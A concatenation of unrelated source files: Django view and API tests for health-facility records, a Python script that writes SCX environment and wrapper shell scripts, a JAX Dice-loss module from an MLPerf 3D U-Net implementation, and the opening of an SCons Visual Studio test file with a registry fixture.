        # POST a complete, valid facility payload to the create view.
        data = {
            "name": fake.name(),
            "mfl_code": random.randint(1, 999_999_999),
            "county": random.choice(WHITELIST_COUNTIES),
            "is_fahari_facility": True,
            "operation_status": "Operational",
            "lon": 0.0,
            "lat": 0.0,
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(reverse("common:facility_create"), data=data)
        # A successful form submission redirects (302).
        self.assertEqual(
            response.status_code,
            302,
        )

    def test_update(self):
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            organisation=self.global_organisation,
        )
        data = {
            "pk": facility.pk,
            "name": fake.name(),
            "mfl_code": random.randint(1, 999_999_999),
            "county": random.choice(WHITELIST_COUNTIES),
            "is_fahari_facility": True,
            "operation_status": "Operational",
            "lon": 0.0,
            "lat": 0.0,
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(
            reverse("common:facility_update", kwargs={"pk": facility.pk}), data=data
        )
        self.assertEqual(
            response.status_code,
            302,
        )

    def test_delete(self):
        facility = baker.make(
            Facility,
            is_fahari_facility=True,
            county=random.choice(WHITELIST_COUNTIES),
            organisation=self.global_organisation,
        )
        response = self.client.post(
            reverse("common:facility_delete", kwargs={"pk": facility.pk}),
        )
        self.assertEqual(
            response.status_code,
            302,
        )
class SystemViewsetTest(LoggedInMixin, APITestCase):
    """Test suite for systems API."""

    def setUp(self):
        self.url_list = reverse("api:system-list")
        super().setUp()

    def test_create(self):
        # names are sliced to 127 chars, presumably to fit the model's
        # max_length — TODO confirm against the System model definition.
        data = {
            "name": fake.name()[:127],
            "description": fake.text(),
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(self.url_list, data)
        assert response.status_code == 201, response.json()
        assert response.data["name"] == data["name"]

    def test_retrieve_systems(self):
        system = baker.make(
            System,
            name=fake.name()[:127],
            organisation=self.global_organisation,
        )
        response = self.client.get(self.url_list)
        assert response.status_code == 200, response.json()
        assert response.data["count"] >= 1, response.json()
        names = [a["name"] for a in response.data["results"]]
        assert system.name in names

    def test_patch_system(self):
        system = baker.make(
            System,
            name=fake.name()[:127],
            organisation=self.global_organisation,
        )
        edit_name = {"name": fake.name()[:127]}
        url = reverse("api:system-detail", kwargs={"pk": system.pk})
        response = self.client.patch(url, edit_name)
        assert response.status_code == 200, response.json()
        assert response.data["name"] == edit_name["name"]

    def test_put_system(self):
        system = baker.make(
            System,
            name=fake.name()[:127],
            organisation=self.global_organisation,
        )
        data = {
            "name": fake.name()[:127],
            "description": fake.text(),
            "organisation": self.global_organisation.pk,
        }
        url = reverse("api:system-detail", kwargs={"pk": system.pk})
        response = self.client.put(url, data)
        assert response.status_code == 200, response.json()
        assert response.data["name"] == data["name"]
class SystemFormTest(LoggedInMixin, TestCase):
    """Form-view tests for system create/update/delete redirects."""

    def _make_system(self):
        """Persist a system in the test organisation."""
        return baker.make(
            System,
            name=fake.name()[:127],
            organisation=self.global_organisation,
        )

    def test_create(self):
        """Creating a system through the form view redirects (302)."""
        payload = {
            "name": fake.name()[:127],
            "pattern": System.SystemPatters.HYBRID.value,
            "description": fake.text(),
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(reverse("common:system_create"), data=payload)
        self.assertEqual(response.status_code, 302)

    def test_update(self):
        """Updating a system through the form view redirects (302)."""
        system = self._make_system()
        payload = {
            "pk": system.pk,
            "name": fake.name()[:127],
            "pattern": System.SystemPatters.POINT_OF_CARE.value,
            "description": fake.text(),
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(
            reverse("common:system_update", kwargs={"pk": system.pk}), data=payload
        )
        self.assertEqual(response.status_code, 302)

    def test_delete(self):
        """Deleting a system through the form view redirects (302)."""
        system = self._make_system()
        response = self.client.post(
            reverse("common:system_delete", kwargs={"pk": system.pk}),
        )
        self.assertEqual(response.status_code, 302)
class UserFacilityViewSetTest(LoggedInMixin, APITestCase):
    """API tests for the user-facility-allotment endpoints."""

    def setUp(self):
        super().setUp()
        self.by_both = UserFacilityAllotment.AllotmentType.BY_FACILITY_AND_REGION
        self.by_facility = UserFacilityAllotment.AllotmentType.BY_FACILITY
        self.by_region = UserFacilityAllotment.AllotmentType.BY_REGION
        self.facilities = baker.make(
            Facility,
            20,
            is_fahari_facility=True,
            county="Nairobi",
            organisation=self.global_organisation,
        )

    def _new_user(self):
        """Create a user in the test organisation."""
        return baker.make(get_user_model(), organisation=self.global_organisation)

    def _new_allotment(self, user):
        """Create a by-facility allotment covering all test facilities."""
        return baker.make(
            UserFacilityAllotment,
            allotment_type=self.by_facility.value,
            facilities=self.facilities,
            organisation=self.global_organisation,
            user=user,
        )

    def test_create(self):
        """POSTing a by-facility allotment returns 201."""
        user = self._new_user()
        payload = {
            "allotment_type": self.by_facility.value,
            "facilities": [facility.pk for facility in self.facilities],
            "user": user.pk,
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(
            reverse("api:userfacilityallotment-list"), data=payload
        )
        assert response.status_code == 201

    def test_retrieve(self):
        """Listing allotments includes a freshly created instance."""
        instance = self._new_allotment(self._new_user())
        response = self.client.get(reverse("api:userfacilityallotment-list"))
        assert response.status_code == 200, response.json()
        assert response.data["count"] >= 1, response.json()
        listed_ids = [entry["id"] for entry in response.data["results"]]
        assert str(instance.pk) in listed_ids

    def test_patch(self):
        """Partial update can switch an allotment to by-region."""
        instance = self._new_allotment(self._new_user())
        changes = {
            "allotment_type": self.by_region.value,
            "region_type": UserFacilityAllotment.RegionType.COUNTY.value,
            "counties": ["Nairobi"],
        }
        response = self.client.patch(
            reverse("api:userfacilityallotment-detail", kwargs={"pk": instance.pk}),
            changes,
        )
        assert response.status_code == 200, response.json()
        for field in ("allotment_type", "region_type", "counties"):
            assert response.data[field] == changes[field]

    def test_put(self):
        """Full update replaces every mutable field."""
        user = self._new_user()
        instance = self._new_allotment(user)
        replacement = {
            "active": False,
            "allotment_type": self.by_region.value,
            "counties": ["Nairobi"],
            "organisation": self.global_organisation.pk,
            "region_type": UserFacilityAllotment.RegionType.COUNTY.value,
            "user": user.pk,
        }
        response = self.client.put(
            reverse("api:userfacilityallotment-detail", kwargs={"pk": instance.pk}),
            replacement,
        )
        assert response.status_code == 200, response.json()
        for field in ("active", "allotment_type", "region_type", "counties"):
            assert response.data[field] == replacement[field]
class UserFacilityAllotmentFormTest(LoggedInMixin, TestCase):
    """Form-view tests for user facility allotments."""

    def setUp(self):
        super().setUp()
        self.by_both = UserFacilityAllotment.AllotmentType.BY_FACILITY_AND_REGION
        self.by_facility = UserFacilityAllotment.AllotmentType.BY_FACILITY
        self.by_region = UserFacilityAllotment.AllotmentType.BY_REGION
        self.facilities = baker.make(
            Facility,
            20,
            is_fahari_facility=True,
            county="Nairobi",
            organisation=self.global_organisation,
        )

    def test_create(self):
        """Creating an allotment through the form view redirects (302)."""
        user = baker.make(get_user_model(), organisation=self.global_organisation)
        payload = {
            "allotment_type": self.by_facility.value,
            "facilities": [facility.pk for facility in self.facilities],
            "user": user.pk,
            "organisation": self.global_organisation.pk,
        }
        response = self.client.post(
            reverse("common:user_facility_allotment_create"), data=payload
        )
        self.assertEqual(response.status_code, 302)

    def test_update(self):
        """Updating the mixin-provided allotment redirects (302)."""
        instance = self.user_facility_allotment
        payload = {
            "pk": instance.pk,
            "allotment_type": self.by_facility.value,
            "facilities": [facility.pk for facility in self.facilities],
            "user": self.user.pk,
            "organisation": self.global_organisation.pk,
            "active": False,
        }
        response = self.client.post(
            reverse("common:user_facility_allotment_update", kwargs={"pk": instance.pk}),
            data=payload,
        )
        self.assertEqual(response.status_code, 302)

    def test_delete(self):
        """Deleting an allotment through the form view redirects (302)."""
        user = baker.make(get_user_model(), organisation=self.global_organisation)
        instance = baker.make(
            UserFacilityAllotment,
            allotment_type=self.by_facility.value,
            facilities=self.facilities,
            organisation=self.global_organisation,
            user=user,
        )
        response = self.client.post(
            reverse("common:user_facility_allotment_delete", kwargs={"pk": instance.pk}),
        )
        self.assertEqual(response.status_code, 302)
|
<reponame>pigera/scxcore<filename>installer/generate_scxcore_scripts.py
import sys
import os
def Get_sh_path(PF):
    """Return the Bourne-shell shebang line for platform *PF*.

    SunOS and HP-UX keep sh under /usr/bin; every other platform uses /bin/sh.
    """
    return '#!/usr/bin/sh' if PF in ('SunOS', 'HPUX') else '#!/bin/sh'
def GenerateSetupScriptFile():
    """Generate scx_setup.sh: PATH plus the platform's shared-library search
    path for running scx binaries.

    Reads the module-level ``Variables`` dict (keys PF, PFARCH, PFMAJOR,
    PFMINOR, BT) and writes into the module-level ``outputDir``.
    """
    lines = ['# Copyright (c) Microsoft Corporation. All rights reserved.\n']
    # Configure script to not complain if environment variable isn't currently set
    lines.append('set +u\n')
    if Variables["PF"] == 'MacOS':
        lines.append('PATH=/usr/libexec/omi/bin:$PATH\n')
    else:
        lines.append('PATH=/opt/omi/bin:$PATH\n')
    lines.append('export PATH\n')
    if Variables["PF"] == 'MacOS':
        # MacOS uses DYLD_LIBRARY_PATH rather than LD_LIBRARY_PATH
        lines.append('DYLD_LIBRARY_PATH=/usr/libexec/microsoft/scx/lib:$DYLD_LIBRARY_PATH\n')
        lines.append('export DYLD_LIBRARY_PATH\n')
    elif Variables["PF"] == 'HPUX' and Variables["PFARCH"] == "pa-risc":
        # 32-bit HP-UX (PA-RISC) uses SHLIB_PATH
        lines.append('SHLIB_PATH=/opt/omi/lib:$SHLIB_PATH\n')
        lines.append('export SHLIB_PATH\n')
    elif Variables["PF"] == "SunOS" and int(Variables["PFMAJOR"]) == 5 and int(Variables["PFMINOR"]) <= 9:
        # Solaris <= 9 needs the extra openssl/local library directories
        lines.append('LD_LIBRARY_PATH=/opt/omi/lib:/usr/local/ssl/lib:/usr/local/lib:$LD_LIBRARY_PATH\n')
        lines.append('export LD_LIBRARY_PATH\n')
    elif Variables["PF"] == "AIX":
        lines.append('LIBPATH=/opt/omi/lib:$LIBPATH\n')
        lines.append('export LIBPATH\n')
        # Since AIX searches LIBPATH first, it is questionable whether we need to define LD_LIBRARY_PATH also, but
        # in the interests of avoiding side effects of code that looks for it, we will set it here.
        lines.append('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH\n')
        lines.append('export LD_LIBRARY_PATH\n')
    else:
        lines.append('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH\n')
        lines.append('export LD_LIBRARY_PATH\n')
    if Variables["BT"] == 'Bullseye':
        # Bullseye code-coverage builds need COVFILE pointing at the coverage data
        lines.append('COVFILE=/var/opt/microsoft/scx/log/OpsMgr.cov\n')
        lines.append('export COVFILE\n')
    # Context manager guarantees the handle is closed even if a write fails
    with open(os.path.join(outputDir, 'scx_setup.sh'), 'w') as shfile:
        shfile.writelines(lines)
def GenerateToolsSetupScriptFile():
    """Generate scx_setup_tools.sh: like scx_setup.sh but the PATH also
    includes the scx tools directory.

    Reads the module-level ``Variables`` dict (keys PF, PFARCH, PFMAJOR,
    PFMINOR, BT) and writes into the module-level ``outputDir``.
    """
    lines = ['# Copyright (c) Microsoft Corporation. All rights reserved.\n']
    # Configure script to not complain if environment variable isn't currently set
    lines.append('set +u\n')
    if Variables["PF"] == 'MacOS':
        lines.append('PATH=/usr/libexec/omi/bin/tools:$PATH\n')
    else:
        lines.append('PATH=/opt/omi/bin:/opt/microsoft/scx/bin/tools:$PATH\n')
    lines.append('export PATH\n')
    if Variables["PF"] == 'MacOS':
        # MacOS uses DYLD_LIBRARY_PATH rather than LD_LIBRARY_PATH
        lines.append('DYLD_LIBRARY_PATH=/usr/libexec/microsoft/scx/lib:$DYLD_LIBRARY_PATH\n')
        lines.append('export DYLD_LIBRARY_PATH\n')
    elif Variables["PF"] == 'HPUX' and Variables["PFARCH"] == "pa-risc":
        # 32-bit HP-UX (PA-RISC) uses SHLIB_PATH
        lines.append('SHLIB_PATH=/opt/omi/lib:$SHLIB_PATH\n')
        lines.append('export SHLIB_PATH\n')
    elif Variables["PF"] == "SunOS" and int(Variables["PFMAJOR"]) == 5 and int(Variables["PFMINOR"]) <= 9:
        # Solaris <= 9 needs the extra openssl/local library directories
        lines.append('LD_LIBRARY_PATH=/opt/omi/lib:/usr/local/ssl/lib:/usr/local/lib:$LD_LIBRARY_PATH\n')
        lines.append('export LD_LIBRARY_PATH\n')
    elif Variables["PF"] == 'AIX':
        lines.append('LIBPATH=/opt/omi/lib:$LIBPATH\n')
        lines.append('export LIBPATH\n')
        # Since AIX searches LIBPATH first, it is questionable whether we need to define LD_LIBRARY_PATH also, but
        # in the interests of avoiding side effects of code that looks for it, we will set it here.
        lines.append('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH\n')
        lines.append('export LD_LIBRARY_PATH\n')
    else:
        lines.append('LD_LIBRARY_PATH=/opt/omi/lib:$LD_LIBRARY_PATH\n')
        lines.append('export LD_LIBRARY_PATH\n')
    if Variables["BT"] == 'Bullseye':
        # Bullseye code-coverage builds need COVFILE pointing at the coverage data
        lines.append('COVFILE=/var/opt/microsoft/scx/log/OpsMgr.cov\n')
        lines.append('export COVFILE\n')
    # Context manager guarantees the handle is closed even if a write fails
    with open(os.path.join(outputDir, 'scx_setup_tools.sh'), 'w') as shfile:
        shfile.writelines(lines)
def GenerateAdminToolScriptFile():
    """Generate scxadmin.sh, a wrapper that sources the tools environment and
    execs the real .scxadmin binary.

    Reads the module-level ``Variables`` dict and writes into ``outputDir``.
    """
    # Install root differs only on MacOS
    if Variables["PF"] == 'MacOS':
        scxpath = "/usr/libexec"
    else:
        scxpath = "/opt"
    # Context manager guarantees the handle is closed even if a write fails
    with open(os.path.join(outputDir, 'scxadmin.sh'), 'w') as shfile:
        shfile.write(Get_sh_path(Variables["PF"]))
        shfile.write('\n\n')
        shfile.write('# Copyright (c) Microsoft Corporation. All rights reserved.\n\n')
        shfile.write('. ' + scxpath + '/microsoft/scx/bin/tools/setup.sh\n')
        # On older (pre-systemd) systems, with non-latin locale set, scxadmin can get
        # 'Exception: Multibyte string conversion failed' errors when trying to convert
        # strings from SCXProcess::Run with output like:
        #
        #    Shutting down Open Group OMI Server:  [  <non-ASCII characters>  ]
        #    Starting Open Group OMI Server:  [  <non-ASCII characters>  ]
        #
        # Just set the C locale (which exists on all systems) to resolve this issue.
        shfile.write('LANG=C; export LANG\n')
        shfile.write('exec ' + scxpath + '/microsoft/scx/bin/tools/.scxadmin "$@"\n')
def GenerateSSLToolScriptFile():
    """Generate scxsslconfig.sh, a wrapper that sources the tools environment
    and execs the real .scxsslconfig binary.

    Reads the module-level ``Variables`` dict and writes into ``outputDir``.
    """
    # Install root differs only on MacOS
    if Variables["PF"] == 'MacOS':
        scxpath = "/usr/libexec"
    else:
        scxpath = "/opt"
    # Context manager guarantees the handle is closed even if a write fails
    with open(os.path.join(outputDir, 'scxsslconfig.sh'), 'w') as shfile:
        shfile.write(Get_sh_path(Variables["PF"]))
        shfile.write('\n\n')
        shfile.write('# Copyright (c) Microsoft Corporation. All rights reserved.\n\n')
        shfile.write('. ' + scxpath + '/microsoft/scx/bin/tools/setup.sh\n')
        shfile.write('exec ' + scxpath + '/microsoft/scx/bin/tools/.scxsslconfig "$@"\n')
def GenerateScripts():
    """Generate all of the scx wrapper/setup shell scripts."""
    for generate in (
            GenerateSetupScriptFile,
            GenerateToolsSetupScriptFile,
            GenerateAdminToolScriptFile,
            GenerateSSLToolScriptFile,
    ):
        generate()
Variables = dict()

# Parse command line arguments: "--NAME=VALUE" options go into Variables,
# anything else is collected as a (file) argument.
args = []
optlist = []
for arg in sys.argv[1:]:
    if len(arg) < 2:
        # Too short to be an option; must be a file
        args.append(arg)
    elif arg.startswith("--"):
        # "--NAME=VALUE"; a bare "--NAME" maps to an empty value
        name, _, value = arg[2:].partition("=")
        Variables[name] = value
    else:
        args.append(arg)

# OUTPUT_DIR must be supplied on the command line (--OUTPUT_DIR=...)
outputDir = Variables["OUTPUT_DIR"]

GenerateScripts()
|
<filename>Google/benchmarks/unet3d/implementations/unet3d-preview-JAX-tpu-v4-128/models/losses.py
"""JAX implementation of losses in 3DUnet.
https://github.com/mmarcinkiewicz/training/blob/Add_unet3d/image_segmentation/unet3d/model/losses.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import functools
from flax import nn
import jax
from jax import lax
import jax.numpy as jnp
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.models import losses_numpy
def cross_entropy_loss(logits: jnp.ndarray,
                       one_hot_labels: jnp.ndarray) -> jnp.ndarray:
  """Returns the cross entropy loss between some logits and some labels.

  Args:
    logits: Output of the model.
    one_hot_labels: One-hot encoded labels. Dimensions should match the logits.

  Returns:
    The cross entropy, averaged over the first dimension (samples).
  """
  # Per-example cross entropy over the last (class) axis, then batch mean.
  per_example = -jnp.sum(one_hot_labels * jax.nn.log_softmax(logits), axis=-1)
  return jnp.mean(per_example)
class Dice(nn.Module):
  """Dice overlap, implemented as a (legacy) flax ``nn.Module``.

  Returns per-sample, per-channel Dice *scores* (higher is better); callers
  such as DiceCELoss turn this into a loss via ``1 - mean(dice)``.
  """
  def apply(self,
            prediction,
            target,
            to_onehot_y=True,
            to_onehot_x=False,
            use_softmax=True,
            use_argmax=False,
            include_background=False,
            layout="NDHWC"):
    """Compute the Dice score between ``prediction`` and ``target``.

    Args:
      prediction: Model output; channel axis position given by ``layout``.
      target: Ground-truth labels; one-hot encoded here when ``to_onehot_y``.
      to_onehot_y: One-hot encode ``target`` before scoring.
      to_onehot_x: One-hot encode ``prediction`` (used with ``use_argmax``).
      use_softmax: Apply softmax over the channel axis (soft Dice).
      use_argmax: Apply argmax instead (hard Dice); only used when
        ``use_softmax`` is False.
      include_background: Keep channel 0 (background) in the score.
      layout: "NCDHW" (channels-first) or anything else for channels-last.

    Returns:
      Dice scores reduced over the spatial axes (batch and channel axes kept).
    """
    # Smoothing keeps the ratio finite when a class is absent from both
    # target and prediction.
    smooth_nr = 1e-6
    smooth_dr = 1e-6
    # reduce_axis covers the spatial dims only, leaving batch and channel.
    if layout == "NCDHW":
      channel_axis = 1
      reduce_axis = tuple(list(range(2, len(prediction.shape))))
    else:
      channel_axis = -1
      reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
    # Channel count captured before any argmax collapses the channel axis.
    num_pred_ch = prediction.shape[channel_axis]
    if use_softmax:
      prediction = jax.nn.softmax(prediction, axis=channel_axis)
    elif use_argmax:
      prediction = jnp.argmax(prediction, axis=channel_axis)
    if to_onehot_y:
      target = to_one_hot(target, layout, channel_axis)
    if to_onehot_x:
      prediction = to_one_hot(prediction, layout, channel_axis)
    if not include_background:
      # Drop channel 0 (background) from both tensors.
      assert num_pred_ch > 1, \
          (f"To exclude background the prediction needs more than one channel. "
           f"Got {num_pred_ch}.")
      if layout == "NCDHW":
        target = target[:, 1:]
        prediction = prediction[:, 1:]
      else:
        target = target[..., 1:]
        prediction = prediction[..., 1:]
    assert (target.shape == prediction.shape), \
        (f"Target and prediction shape do not match. Target: ({target.shape}), "
         f"prediction: ({prediction.shape}).")
    # Classic smoothed Dice: 2*|A∩B| / (|A| + |B|), per channel.
    intersection = jnp.sum(target * prediction, axis=reduce_axis)
    target_sum = jnp.sum(target, axis=reduce_axis)
    prediction_sum = jnp.sum(prediction, axis=reduce_axis)
    dice = (2.0 * intersection + smooth_nr) / (
        target_sum + prediction_sum + smooth_dr)
    return dice
def to_one_hot(array, layout, channel_axis, num_classes=3):
  """One-hot encode a dense class-index array.

  Args:
    array: Class-index array. If it still carries a (singleton) channel axis
      (rank >= 5), that axis is squeezed out first.
    layout: "NCDHW" moves the new one-hot axis to position 1
      (channels-first); any other value leaves it last.
    channel_axis: Axis holding the singleton channel dim, if present.
    num_classes: Number of classes to encode. Defaults to 3 (the 3DUnet
      setting), so all existing callers are unchanged.

  Returns:
    float32 one-hot array with ``num_classes`` channels.
  """
  if len(array.shape) >= 5:
    array = jnp.squeeze(array, axis=channel_axis)
  array = jax.nn.one_hot(
      lax.convert_element_type(array, jnp.int32),
      num_classes=num_classes,
      dtype=jnp.float32)
  if layout == "NCDHW":
    # Move the one-hot axis from last to the channels-first position.
    array = jnp.transpose(array, (0, 4, 1, 2, 3))
  return array
class DiceCELoss(nn.Module):
  """Combined Dice + cross-entropy loss, averaged 50/50."""
  def apply(self, y_pred, y_true, to_onehot_y, use_softmax, layout,
            include_background=False):
    """Return ``(dice_loss + cross_entropy) / 2`` for a batch.

    Args:
      y_pred: Model logits; channel axis position given by ``layout``.
      y_true: Dense class-index labels.
      to_onehot_y: Forwarded to Dice (one-hot encode ``y_true``).
      use_softmax: Forwarded to Dice (softmax the prediction).
      layout: "NCDHW" (channels-first) or channels-last otherwise.
      include_background: Forwarded to Dice (keep channel 0).
    """
    # Dice term: 1 - mean Dice score over batch and channels.
    dice_fn = Dice.partial(to_onehot_y=to_onehot_y, use_softmax=use_softmax,
                           include_background=include_background)
    dice = 1.0 - jnp.mean(dice_fn(y_pred, y_true))
    if layout == "NCDHW":
      channel_axis = 1
    else:
      channel_axis = -1
    # Cross-entropy term computed against the one-hot encoded labels.
    cross_entropy = cross_entropy_loss(y_pred,
                                       to_one_hot(y_true, layout, channel_axis))
    # Equal weighting of the two terms.
    return (dice + cross_entropy) / 2
class DiceScore(nn.Module):
  """Hard Dice score (argmax + one-hot) used as an evaluation metric."""
  def apply(self,
            y_pred,
            y_true,
            to_onehot_y=True,
            use_argmax=True,
            layout="NDHWC",
            include_background=False,
            compute_mean_score=True):
    """Return Dice scores for a batch of predictions.

    Args:
      y_pred: Model output; argmax'd over the channel axis when
        ``use_argmax``.
      y_true: Dense class-index labels.
      to_onehot_y: One-hot encode ``y_true`` inside Dice.
      use_argmax: Take the hard class decision (no softmax).
      layout: "NCDHW" or "NDHWC".
      include_background: Keep the background channel in the score.
      compute_mean_score: If True, average the scores over the batch axis;
        otherwise return the per-sample scores.
    """
    # Hard Dice: no softmax; the argmax'd prediction is re-encoded one-hot
    # (to_onehot_x) so it is comparable with the one-hot target.
    dice_fn = Dice.partial(
        to_onehot_y=to_onehot_y,
        to_onehot_x=True,
        use_softmax=False,
        use_argmax=use_argmax,
        layout=layout,
        include_background=include_background)
    dice_scores = dice_fn(y_pred, y_true)
    if compute_mean_score:
      return jnp.mean(dice_scores, axis=0)
    else:
      return dice_scores
def get_loss_fn(key, params, for_cpu=False, compute_mean_dice_score=True):
  """Get Unet DiceLoss and DiceScore fns.

  Args:
    key: random.PRNGKey(seed)
    params: Config parameter dictionary.
    for_cpu: If true, returns numpy implementation of the loss_fn and score_fn.
    compute_mean_dice_score: Whether to compute the mean scores or not for
      images.

  Returns:
    dice_loss_fn: dice loss fn.
    dice_score_fn: dice score fn.
  """
  layout = params["layout"]
  include_background = params["include_background"]
  dtype = params["dtype"]
  n_class = params["n_class"]
  device_batch_size = params["device_batch_size"]
  # Drop the trailing channel entry of input_shape; logits get n_class
  # channels appended, labels stay dense (no channel axis).
  train_data_shape = params["input_shape"][:-1]
  input_shape = (device_batch_size, *train_data_shape, n_class)
  label_shape = (device_batch_size, *train_data_shape)
  if for_cpu:
    # CPU evaluation path: plain-numpy implementations, no flax tracing.
    dice_loss_fn = functools.partial(
        losses_numpy.compute_dice_ce_loss,
        to_onehot_y=True,
        use_softmax=True,
        layout=layout,
        include_background=include_background)
    dice_score_fn = functools.partial(
        losses_numpy.compute_dice_score,
        to_onehot_y=True,
        use_argmax=True,
        layout=layout,
        include_background=include_background,
        compute_mean_score=compute_mean_dice_score)
  else:
    # NOTE(review): legacy flax API — create_by_shape traces the module with
    # dummy inputs of the given shapes/dtypes; the second return value is the
    # callable model (params are unused for these stateless modules) —
    # confirm against the flax.nn documentation.
    dice_loss_def = DiceCELoss.partial(
        to_onehot_y=True,
        use_softmax=True,
        layout=layout,
        include_background=include_background)
    _, dice_loss_fn = dice_loss_def.create_by_shape(key,
                                                    [(input_shape, dtype),
                                                     (label_shape, jnp.int32)])
    dice_score_def = DiceScore.partial(
        to_onehot_y=True,
        use_argmax=True,
        layout=layout,
        include_background=include_background,
        compute_mean_score=compute_mean_dice_score)
    _, dice_score_fn = dice_score_def.create_by_shape(key,
                                                      [(input_shape, dtype),
                                                       (label_shape, dtype)])
  return dice_loss_fn, dice_score_fn
def dice_score_withoout_background(prediction, target):
"""This is the special case of DiceScore where prediction has C - 1 channels.
This is to reduce some memory usage from storing the global results. Each
entry in the prediction now has C - 1 channels whee,
new_prediction[..., :i] = old[..., :i + 1] - old[..., :0]
So, when we check for argmax, we also check for max value, if less than 0,
this means that it is background.
Args:
prediction: 5D numpy array. [Image, H, W, D, C - 1].
target: 4D [Image, H, W, D], or 5D [Image, H, W, D, C, 1] target classes
array.
Returns:
Dice score per image, [B]. Does not computes mean unlike others.
"""
smooth_nr = 1e-6
smooth_dr = 1e-6
channel_axis = -1
reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
# to reduce memory class scores are shrinked from 3 elements to 2 elements.
# newscore[1] = oldscore[2] - old_score[0]
# newscore[0] = oldscore[1] - old_score[0]
# If max value is less than 0, this means that background has the max value.
is_not_background = (jnp.max(prediction, axis=-1) > 0).astype(jnp.int8)
# arg max will simply return 0, 1, 2. int8 is okay to use.
prediction = jax.lax.argmax(prediction,
len(prediction.shape) + channel_axis,
jnp.int8)
prediction = (prediction + 1) * is_not_background
if len(prediction.shape) >= 5:
prediction = jnp.squeeze(prediction, axis=channel_axis)
# One hot will also return only 0 or 1, so int8 is okay.
prediction = jax.nn.one_hot(
jax.lax.convert_element_type(prediction, jnp.int8),
num_classes=3,
dtype=jnp.int8)
prediction = prediction[..., 1:]
if len(target.shape) >= 5:
target = jnp.squeeze(target, axis=channel_axis)
# As above, int8 is okay for one hot.
target = jax.nn.one_hot(
jax.lax.convert_element_type(target, jnp.int8),
num_classes=3,
dtype=jnp.int8)
target = target[..., 1:]
intersection = jnp.sum((target * prediction).astype(jnp.float32),
axis=reduce_axis)
target_sum = jnp.sum(target.astype(jnp.float32), axis=reduce_axis)
prediction_sum = jnp.sum(prediction.astype(jnp.float32), axis=reduce_axis)
dice = (2.0 * intersection + smooth_nr) / (
target_sum + prediction_sum + smooth_dr)
return dice
def dice_score(prediction, target):
"""This is the special case of DiceScore from losses.py, separated for simplicity.
Args:
prediction: 5D numpy array. [Image, H, W, D, C].
target: 4D [Image, H, W, D], or 5D [Image, H, W, D, C, 1] target classes
array.
Returns:
Dice score per image, [B]. Does not computes mean unlike others.
"""
smooth_nr = 1e-6
smooth_dr = 1e-6
channel_axis = -1
reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
# arg max will simply return 0, 1, 2. int8 is okay to use.
prediction = jax.lax.argmax(prediction,
len(prediction.shape) + channel_axis,
jnp.int8)
if len(prediction.shape) >= 5:
prediction = jnp.squeeze(prediction, axis=channel_axis)
# One hot will also return only 0 or 1, so int8 is okay.
prediction = jax.nn.one_hot(
jax.lax.convert_element_type(prediction, jnp.int8),
num_classes=3,
dtype=jnp.int8)
prediction = prediction[..., 1:]
if len(target.shape) >= 5:
target = jnp.squeeze(target, axis=channel_axis)
# As above, int8 is okay for one hot.
target = jax.nn.one_hot(
jax.lax.convert_element_type(target, jnp.int8),
num_classes=3,
dtype=jnp.int8)
target = target[..., 1:]
intersection = jnp.sum((target * prediction).astype(jnp.float32),
axis=reduce_axis)
target_sum = jnp.sum(target.astype(jnp.float32), axis=reduce_axis)
prediction_sum = jnp.sum(prediction.astype(jnp.float32), axis=reduce_axis)
dice = (2.0 * intersection + smooth_nr) / (
target_sum + prediction_sum + smooth_dr)
return dice
|
<filename>src/engine/SCons/Tool/msvsTests.py
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os
import string
import sys
import TestCmd
import unittest
from SCons.Tool.msvs import *
import SCons.Util
import SCons.Warnings
# Registry-dump fixture: Visual Studio 6.0 with MSDN + Visual C++ only (SP3).
# The deprecated Python-2-only string.split(s, sep) module function is
# replaced by the equivalent str.split method (identical result, and also
# valid on Python 3); the fixture text itself is unchanged.
regdata_6a = r'''[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\ServicePacks]
"sp3"=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup]
"VsCommonDir"="C:\Program Files\Microsoft Visual Studio\Common"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Developer Network Library - Visual Studio 6.0a]
"ProductDir"="C:\Program Files\Microsoft Visual Studio\MSDN98\98VSa\1033"
